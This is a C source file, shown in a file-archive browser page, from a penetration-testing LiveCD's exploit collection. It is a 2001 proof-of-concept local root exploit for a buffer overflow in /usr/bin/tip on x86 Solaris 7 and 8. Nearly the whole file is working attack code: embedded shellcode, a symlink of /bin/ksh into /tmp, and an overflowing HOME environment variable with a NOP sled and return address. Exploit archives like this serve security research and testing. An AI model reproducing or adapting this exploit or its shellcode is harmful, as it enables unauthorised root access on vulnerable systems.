home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / solaris / local / tip1.c < prev    next >
C/C++ Source or Header  |  2005-02-12  |  1KB  |  37 lines
  1. /*
  2.    /usr/bin/tip overflow proof of conecpt.
  3.  
  4.    Pablo Sor, Buenos Aires, Argentina 03/2001 (psor@afip.gov.ar)
  5.  
  6.    works against x86 solaris 7,8
  7.    default offset should work.
  8. */
  9.  
  10. long get_esp() { __asm__("movl %esp,%eax"); }
  11.  
  12. int main(int ac, char **av)
  13. {
  14.   char shell[]=
  15.     "\xeb\x0a\x9a\x01\x02\x03\x5c\x07\x04\xc3\xeb\x05"
  16.     "\xe8\xf9\xff\xff\xff\x5e\x29\xc0\x88\x46\xf7\x89\x46\xf2"
  17.     "\x50\xb0\x8d\xe8\xe0\xff\xff\xff\x6a\x05\x90\xb0\x17\xe8\xd6\xff\xff\xff"
  18.     "\xeb\x1f\x5e\x8d\x1e\x89\x5e\x0b\x29\xc0\x88\x46\x19\x89\x46\x14"
  19.     "\x89\x46\x0f\x89\x46\x07\xb0\x3b\x8d\x4e\x0b\x51\x51\x53\x50\xeb\x18"
  20.     "\xe8\xdc\xff\xff\xff\x2f\x74\x6d\x70\x2f\x78\x78\x01\x01\x01\x01\x02\x02"
  21.     "\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";
  22.  
  23.   unsigned long magic = get_esp() + 0x50;  /* default offset */
  24.   unsigned char buf[600];
  25.  
  26.   symlink("/bin/ksh","/tmp/xx");
  27.   memset(buf,0x90,600);
  28.   buf[599]=0;
  29.   memcpy(buf+(sizeof(buf)-strlen(shell)),shell,strlen(shell));
  30.   memcpy(buf,"HOME=",5);
  31.   memcpy(buf+265,&magic,4);
  32.   putenv(buf);
  33.  
  34.   system("/usr/bin/tip 5");
  35.   unlink("/tmp/xx");
  36. }
  37. /*                www.hack.co.za           [17 April 2001]*/